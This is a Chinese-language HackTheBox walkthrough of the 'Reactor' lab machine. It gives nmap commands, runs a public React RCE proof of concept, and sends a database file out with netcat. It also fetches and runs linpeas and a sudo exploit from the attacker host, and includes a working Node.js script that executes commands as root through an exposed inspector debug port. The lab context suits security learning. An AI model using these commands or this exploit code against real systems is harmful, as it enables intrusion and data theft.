HTB - Reactor

前言

···

最近太忙嘞,忙里抽空打了一下,望各位见谅

···

复制代码
10.129.4.61

nmap扫描

复制代码
sudo nmap --top-ports 10000 10.129.4.61 --min-rate=1000 -oA ips_quick_TCP_nmapscan && sudo nmap --top-ports 10000 10.129.4.61 --min-rate=1000 -sU -oA ips_quick_UDP_nmapscan && nmap -p- 10.129.4.61 -oA ips_full_TCP_nmapscan --min-rate=1000 && sudo nmap -p- 10.129.4.61 -sU -oA ips_full_UDP_nmapscan --min-rate=1000

nmap详细扫描

复制代码
nmap -sV -sC -p22,3000 --min-rate=1000 10.129.4.61 -vv -Pn

我们进一步查看3000端口,访问

复制代码
http://10.129.4.61:3000/

查明中间件版本,发现React,该框架在2025年爆出RCE漏洞

我们查找道POC

复制代码
https://github.com/ThemeHackers/CVE-2025-55182

使用POC

复制代码
python CVE-2025-55182.py -u http://10.129.4.61:3000/ 

开始反连

复制代码
python CVE-2025-55182.py -u http://10.129.4.61:3000/  --exploit

发现reactor.db,传输文件道kali

复制代码
nc -lvnp 8888 > reactor.db
nc -q 0 10.10.14.240 8888 < reactor.db

查看文件

破解密码

获取engineer用户

复制代码
engineer:reactor1

上linpeas

复制代码
wget http://10.10.14.240/linpeas.sh && chmod 755 linpeas.sh && ./linpeas.sh

尝试sudo提权,提权失败·

复制代码
wget http://10.10.14.240/sudo_Pwned_1_9_14-1_9_17.sh && chmod 755 sudo_Pwned_1_9_14-1_9_17.sh && ./sudo_Pwned_1_9_14-1_9_17.sh

我们发现9229开启了node的调试端口

访问端口查看调试端口后面的序列

复制代码
curl http://127.0.0.1:9229/json

我们使用ws链接调试端口,并执行恶意命令

复制代码
const WebSocket = require('ws');

const ws = new WebSocket('ws://127.0.0.1:9229/5c0cfa64-f235-4c68-9b60-57251cead0a2'); //Change it to your ws

ws.on('open', function () {
    console.log('connected');

    // 执行 JS
    ws.send(JSON.stringify({
        id: 1,
        method: "Runtime.evaluate",
        params: {
            expression: `
                this.constructor.constructor('return process')()
                .mainModule.require('child_process')
                .execSync('id')
                .toString()
            `
        }
    }));
});

ws.on('message', function (data) {
    console.log(data.toString());
});

执行脚本

复制代码
npm install ws

ssh -L 9229:127.0.0.1:9229 engineer@10.129.4.61 -fN 

node nodejs_debug_port_RCE.js

到此已经完成root的任意命令执行。

相关推荐
Johny_Zhao2 小时前
FreeRADIUS + 华为AC/AP + 802.1X/WPA2-Enterprise 无线认证对接部署完整指南
网络·网络安全·信息安全·ldap·radius·huawei·系统运维·centos8
运行时异常2 小时前
【WMS 仓储系统集成 AI Agent 实战】第 8 讲(终篇):生产部署与并发安全——Semaphore 放进 Flux.defer 的坑,压测抓了一晚上
人工智能·安全
虹科网络安全2 小时前
“顶会”看安全(十八):超越越狱:揭示由能力边界模糊引发的 LLM 应用安全风险
人工智能·安全
hasty2 小时前
OAuth 登录成功,不代表邮箱可信:Flarum 账号关联漏洞的安全编码启示
安全
天远API3 小时前
零信任架构实战:基于天远人企关联构建自动化图谱网关
网络·人工智能·架构·自动化
国科安芯4 小时前
断电也隔离、听得真:ASL3159S 单通道 SPDT 模拟开关的“断电保护 + 音频保真“账
单片机·嵌入式硬件·安全·商业航天·抗辐射
vipjx14 小时前
百度网盘限速怎么破?2026实测PanDownload多线程提速方案
网络·智能路由器
hasty4 小时前
2026软件供应链安全政策全景
安全·安全威胁分析·代码复审
小程序设计4 小时前
基于STM32的智慧厨房多参数安全监测与预警系统设计
stm32·嵌入式硬件·安全
锐速网络5 小时前
轻量化安全建设指南:无需硬件的SaaS化勒索病毒防御方案
网络安全·云备份·主机安全·saas安全·勒索病毒防护·轻量化安全·中小企业安全